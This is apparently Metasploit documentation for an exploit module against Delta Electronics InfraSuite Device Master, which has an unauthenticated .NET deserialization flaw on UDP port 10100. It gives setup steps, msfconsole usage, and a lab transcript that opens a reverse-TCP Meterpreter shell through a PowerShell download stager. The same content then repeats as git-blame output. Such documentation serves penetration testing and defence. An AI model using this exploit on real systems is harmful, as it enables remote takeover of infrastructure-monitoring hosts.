documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md

## Vulnerable Application

Delta Electronics InfraSuite Device Master versions below `v1.0.5` are vulnerable to
an unauthenticated .NET deserialization vulnerability in the `Device-Gateway-Status` process which
listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled
data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method without appropriate validation,
resulting in code execution as the user running the `Device-Gateway-Status` process.

### Installation Instructions

1. Unzip and run the installer from https://archive.org/details/infra-suite-device-master-00.00.01ax-64
2. Install all of the pre-requisites (Stack Builder is not needed) and reboot
3. Click `next` and ensure the three features, `Device-Monitor`, `Device-DataCollect`, and `Device-Gateway` are selected to install
4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit
5. Click `Next`, then `Install`
6. Click `Finish`, then wait for the processing of files to finish
7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click `Finish`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/delta_electronics_infrasuite_deserialization`
4. Do: `set RHOST <IP>`
5. Do: `set INFRASUITE_PORT <PORT_NO>`
6. Do: `run`
7. You should get a meterpreter session.

## Options

### INFRASUITE_PORT

This is the option on which the web-based InfraSuite Device Manager listens. It is
only used to check the version of the software to determine exploitability. 80 by default

## Scenarios

### InfraSuite Device Master v01.00.00d on Windows 10 x64

```
msf6 > use exploit/windows/misc/delta_electronics_infrasuite_deserialization
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set rhost 192.168.140.187
rhost => 192.168.140.187
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > options

Module options (exploit/windows/misc/delta_electronics_infrasuite_deserialization):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   INFRASUITE_PORT  80               yes       The port on which the InfraSuite Manager is listening
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port]
                                               [...]
   RHOSTS           192.168.140.187  yes       The target host(s), see https://docs.metasploit.com/doc
                                               s/using-metasploit/basics/using-metasploit.html
   RPORT            10100            yes       The target port (UDP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly g
                                               enerated)
   TARGETURI        /                yes       The base path to the InfraSuite Manager
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be
                                       an address on the local machine or 0.0.0.0 to listen on all add
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.140.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows EXE Dropper


View the full module info with the info, or info -d command.


msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting the login page to determine if target is Infrasuite Device Master...
[*] Target is InfraSuite Device Master. Now attempting to determine version.
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/xkRhewOXntAgYs
[*] Command Stager progress - 100.00% done (153/153 bytes)
[*] Client 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673) requested /xkRhewOXntAgYs
[*] Sending payload to 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673)
[*] Sending stage (175686 bytes) to 192.168.140.187
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.187:50409) at 2023-06-05 17:09:29 -0500
[*] Server stopped.

meterpreter > getuid
Server username: DESKTOP-R6RCNHH\space
meterpreter > sysinfo
Computer        : DESKTOP-R6RCNHH
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter >
```
add documentation 2023-06-05 17:38:58 -05:00			`## Vulnerable Application`

			Delta Electronics InfraSuite Device Master versions below `v1.0.5` are vulnerable to
Update documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md 2023-06-07 16:41:19 -05:00			an unauthenticated .NET deserialization vulnerability in the `Device-Gateway-Status` process which
add documentation 2023-06-05 17:38:58 -05:00			listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled
Update documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md 2023-06-07 16:41:28 -05:00			data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method without appropriate validation,
add documentation 2023-06-05 17:38:58 -05:00			resulting in code execution as the user running the `Device-Gateway-Status` process.

			`### Installation Instructions`

Add in link to archived version of the installer 2023-06-07 16:51:01 -05:00			`1. Unzip and run the installer from https://archive.org/details/infra-suite-device-master-00.00.01ax-64`
add installation steps 2023-06-06 12:14:14 -05:00			`2. Install all of the pre-requisites (Stack Builder is not needed) and reboot`
			3. Click `next` and ensure the three features, `Device-Monitor`, `Device-DataCollect`, and `Device-Gateway` are selected to install
			4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit
Update documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md 2023-06-07 16:41:37 -05:00			5. Click `Next`, then `Install`
add installation steps 2023-06-06 12:14:14 -05:00			6. Click `Finish`, then wait for the processing of files to finish
Update documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md 2023-06-07 16:41:44 -05:00			7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click `Finish`
add installation steps 2023-06-06 12:14:14 -05:00
add documentation 2023-06-05 17:38:58 -05:00			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/windows/misc/delta_electronics_infrasuite_deserialization`
			4. Do: `set RHOST <IP>`
			5. Do: `set INFRASUITE_PORT <PORT_NO>`
			6. Do: `run`
			`7. You should get a meterpreter session.`

			`## Options`

			`### INFRASUITE_PORT`

			`This is the option on which the web-based InfraSuite Device Manager listens. It is`
			`only used to check the version of the software to determine exploitability. 80 by default`

			`## Scenarios`

			`### InfraSuite Device Master v01.00.00d on Windows 10 x64`

			```
add options in scenarios output 2023-06-07 17:15:28 -05:00			`msf6 > use exploit/windows/misc/delta_electronics_infrasuite_deserialization`
			`[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp`
			`msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set rhost 192.168.140.187`
			`rhost => 192.168.140.187`
			`msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set lhost 192.168.140.1`
			`lhost => 192.168.140.1`
			`msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > options`

			`Module options (exploit/windows/misc/delta_electronics_infrasuite_deserialization):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`INFRASUITE_PORT 80 yes The port on which the InfraSuite Manager is listening`
			`Proxies no A proxy chain of format type:host:port[,type:host:port]`
			`[...]`
			`RHOSTS 192.168.140.187 yes The target host(s), see https://docs.metasploit.com/doc`
			`s/using-metasploit/basics/using-metasploit.html`
			`RPORT 10100 yes The target port (UDP)`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`SSLCert no Path to a custom SSL certificate (default is randomly g`
			`enerated)`
			`TARGETURI / yes The base path to the InfraSuite Manager`
			`URIPATH no The URI to use for this exploit (default is random)`
			`VHOST no HTTP server virtual host`


			`When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be`
			`an address on the local machine or 0.0.0.0 to listen on all add`
			`resses.`
			`SRVPORT 8080 yes The local port to listen on.`


			`Payload options (windows/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
			`LHOST 192.168.140.1 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Windows EXE Dropper`



			`View the full module info with the info, or info -d command.`


add documentation 2023-06-05 17:38:58 -05:00			`msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run`

			`[*] Started reverse TCP handler on 192.168.140.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Requesting the login page to determine if target is Infrasuite Device Master...`
			`[*] Target is InfraSuite Device Master. Now attempting to determine version.`
			`[+] The target appears to be vulnerable.`
			`[*] Using URL: http://192.168.140.1:8080/xkRhewOXntAgYs`
			`[*] Command Stager progress - 100.00% done (153/153 bytes)`
			`[*] Client 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673) requested /xkRhewOXntAgYs`
			`[*] Sending payload to 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673)`
			`[*] Sending stage (175686 bytes) to 192.168.140.187`
			`[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.187:50409) at 2023-06-05 17:09:29 -0500`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: DESKTOP-R6RCNHH\space`
			`meterpreter > sysinfo`
			`Computer : DESKTOP-R6RCNHH`
			`OS : Windows 10 (10.0 Build 19045).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 5`
			`Meterpreter : x86/windows`
			`meterpreter >`
			```